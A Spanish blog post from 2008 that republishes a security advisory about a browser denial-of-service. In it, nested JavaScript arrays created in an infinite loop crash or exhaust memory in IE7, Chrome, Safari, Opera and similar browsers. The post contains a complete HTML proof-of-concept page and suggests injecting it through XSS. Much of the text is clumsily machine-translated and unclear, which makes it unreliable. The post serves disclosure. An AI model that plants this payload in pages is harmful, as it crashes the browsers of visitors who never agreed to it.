Múltiples navegadores son vulnerables a un debordamiento de pila con un array infinito en Javascript

##################################################
Múltiples navegadores son vulnerables a un debordamiento de pila con un array infinito en Javascript
##################################################
############
Descripción
############

Múltiples navegadores son vulnerables a un desbordamiento de pila
o accidente a través de un array infinito en el motor de Javascript.

Se trata de una investigación ampliada de esta vulnerabilidad // para explotar:

http://www.securityfocus.com/bid/31703

Este problema se puede utilizar, por ejemplo, en una web vulnerables a ataques XSS o
similares para hacer un DoS a la web de los navegadores de la web de la víctima.

################
Navegadores probados:
################

Fail = No afectados
Pass = ¿No afecta?

#####################
Pruebas
#####################
.: [-Múltiples Navegadores de infinita gama PoC Por Lostmon -]:.
Aquí tienes dos variantes de este array SAV en este archivo:
#####################################
<html>
<head>
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>
<script type=”text/javascript”>
function infinite_array()
{
foo = new Array();
alert(‘infinite array’);
while(true) {foo = new Array(foo);}
}
function infinite_array2()
{
foo = new Array();
alert(‘Infinite array with sort()’);
while(true) {foo = new Array(foo).sort();}
}
</script>
</head>
<body>
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>
<input type=”button” value=”Infinite array Without sort()” onclick=”infinite_array();” />
<input type=”button” value=”Infinite array with sort()” onclick=”infinite_array2();” />
</body></html>
####################################

###############
Stack Overflow
###############

IE7, Avant Browser y Maxthor son los navegadores vulnerables a esta causa de desbordamiento de pila en javascript.

En IE7: se trata de localizar y explotar con OLLYdbg (un depurador),
pero en todos los casos; lo que prueba que a su vez un ejecutable va a ir al mismo tiempo a la SEH. (Nota: esto no es explotación), si esto os pasa, hagan click en la descripción para seguir trabajando sin problemas;
esto se trata de un error recuperable. Microsoft y su equipo de seguridad ha de determinar que esta cuestión en este momento no es explotable.

En Google Chrome puede causar una pestaña de bloqueo o si sólo tenemos que abrir una ventana y una ficha, habrá la explotación, cuando esto pase, hay que tratar de ir a Google u otro sitio porque a causa de esto Google Chrome se cerrará sin previo aviso, error, o alert, si tenemos que abrir múltiples pestañas, esta cuestión sólo rompe o cierra las pestañas a los afectados por esta explotación. Si quiere abrir la explotación, espere unos segundos y Chrome le mostrará una advertencia para cerrar la pestaña que se rompió.

################
Abuso de memoria
################

En IE7 puede provocar un abuso de memoria y puede convertir todos los uninstall del
sistema y todas las aplicaciones. (se puede cargar toda la memoria)

En Safari (Windows), puede causar la terminación de un programa, safari
cierra todas las ventanas, todas las pestañas sin previo aviso o una advertencia o
error. Pero OLLY, puede rastrear, y ver donde hay un desbordamiento de pila.

En Google Chrome puede causar una pestaña de bloqueo o si sólo se han abierto
una ventana y una pestaña, surgirá la explotación, no hay que no esperar, hay que intentar
ir a google u otro sitio por las causas que Google Chrome cerrará sin previo aviso, error, o un “alert”.
En caso de abrir la explotación, espere unos segundos a que Chrome le muestre una advertencia para cerrarla
al romperse la pestaña.

Algunos navegadores detectan la lentitud de los scripts y dejan de funcionar.
En Opera, causó abuso de memoria, pero se puede recuperar o navegar a otros sitios, ya que se trata de una cuestión de reembolso.

#######################€nd#####################

Thnx to Microsoft security team for support & interesting.
Thnx to Apple security team for support & interesting.

Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

atentamente:
Lostmon (lostmon@gmail.com)

Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

———————–

Gracias Lostmon 🙂

Anuncios

0 Responses to “Múltiples navegadores son vulnerables a un debordamiento de pila con un array infinito en Javascript”



  1. Dejar un comentario

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s




Blog Stats

  • 612,248 visitas

RSS

Feed
noviembre 2008
L M X J V S D
« Oct   Dic »
 12
3456789
10111213141516
17181920212223
24252627282930

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker

A %d blogueros les gusta esto: